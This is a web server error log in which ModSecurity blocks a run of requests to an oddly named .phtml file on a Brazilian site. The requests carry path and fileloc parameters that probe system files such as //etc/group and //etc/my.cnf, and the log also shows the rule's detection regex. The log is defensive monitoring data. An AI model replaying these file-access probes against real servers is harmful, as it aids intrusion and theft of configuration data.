[Fri Mar 20 06:54:03.439547 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.5:42444] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZO9a6ubjKNq_cu4bFaAAAA0M"]
[Fri Mar 20 06:54:03.875685 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.39:42448] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOxCii7xarUs8iHZZ0wAAAgs"]
[Fri Mar 20 06:54:04.183412 2026] [:error] [pid 11167:tid 140411699963648] [client 57.141.18.28:42454] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPPHIg5MgXLBnicPrEAAAAcU"]
[Fri Mar 20 06:54:04.317418 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.104:42458] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPBCii7xarUs8iHZZ1AAAAhU"]
[Fri Mar 20 06:54:04.509425 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.66:42460] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPBCii7xarUs8iHZZ1QAAAhM"]
[Fri Mar 20 06:54:04.922612 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.4:42470] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPPHIg5MgXLBnicPrEQAAAcg"]
[Fri Mar 20 06:54:05.383678 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.23:42476] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPV1pVZ5mVmJwsFMhkAAAAEs"]
[Fri Mar 20 06:54:06.218680 2026] [:error] [pid 9818:tid 140411624429312] [client 57.141.18.76:42488] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPl1pVZ5mVmJwsFMhkgAAAE4"]
[Fri Mar 20 06:54:06.372258 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.49:42498] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPl1pVZ5mVmJwsFMhlAAAAFE"]
[Fri Mar 20 06:54:06.422642 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.9:42502] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPl1pVZ5mVmJwsFMhlQAAAFg"]
[Fri Mar 20 06:54:06.798781 2026] [:error] [pid 21219:tid 140411557287680] [client 57.141.18.19:42510] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPvXLqtnMIWvjpaKMjQAAApY"]
[Fri Mar 20 06:54:07.191501 2026] [:error] [pid 31215:tid 140411725141760] [client 57.141.18.76:42516] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZPwF0L0L-SsrnPo5acgAAAsI"]
[Fri Mar 20 06:54:07.473472 2026] [:error] [pid 11167:tid 140411725141760] [client 57.141.18.83:42522] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZP_HIg5MgXLBnicPrEgAAAcI"]
[Fri Mar 20 06:54:08.155760 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.97:42536] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQNa6ubjKNq_cu4bFaQAAA0k"]
[Fri Mar 20 06:54:08.447267 2026] [:error] [pid 7235:tid 140411632822016] [client 57.141.18.25:42544] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQPqxLDW4GITHUkTXIAAAAQ0"]
[Fri Mar 20 06:54:08.463736 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.115:42546] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQOoXxyEfFpUF8f9z-gAAAU4"]
[Fri Mar 20 06:54:08.737430 2026] [:error] [pid 7893:tid 140411599251200] [client 57.141.18.77:42548] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQBCii7xarUs8iHZZ1wAAAhE"]
[Fri Mar 20 06:54:09.543697 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.7:42568] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQQF0L0L-SsrnPo5adAAAAsc"]
[Fri Mar 20 06:54:09.937499 2026] [:error] [pid 11167:tid 140411641214720] [client 57.141.18.12:42554] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQfHIg5MgXLBnicPrFgAAAcw"]
[Fri Mar 20 06:54:10.203045 2026] [:error] [pid 7235:tid 140411741927168] [client 57.141.18.117:42586] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQvqxLDW4GITHUkTXIQAAAQA"]
[Fri Mar 20 06:54:10.566477 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.111:42590] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQta6ubjKNq_cu4bFagAAA0Y"]
[Fri Mar 20 06:54:10.657662 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.85:42592] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQuoXxyEfFpUF8f9z-wAAAVM"]
[Fri Mar 20 06:54:11.234670 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.8:42610] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQxCii7xarUs8iHZZ2AAAAg4"]
[Fri Mar 20 06:54:11.511879 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.48:42614] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQ9a6ubjKNq_cu4bFawAAA1Y"]
[Fri Mar 20 06:54:11.998373 2026] [:error] [pid 11167:tid 140411683178240] [client 57.141.18.42:42624] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZQ_HIg5MgXLBnicPrGQAAAcc"]
[Fri Mar 20 06:54:12.257759 2026] [:error] [pid 31215:tid 140411590858496] [client 57.141.18.69:42628] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRAF0L0L-SsrnPo5adgAAAtI"]
[Fri Mar 20 06:54:12.271720 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.112:42630] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRPqxLDW4GITHUkTXIgAAARI"]
[Fri Mar 20 06:54:12.606961 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.120:42642] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZRNa6ubjKNq_cu4bFbAAAA1Q"]
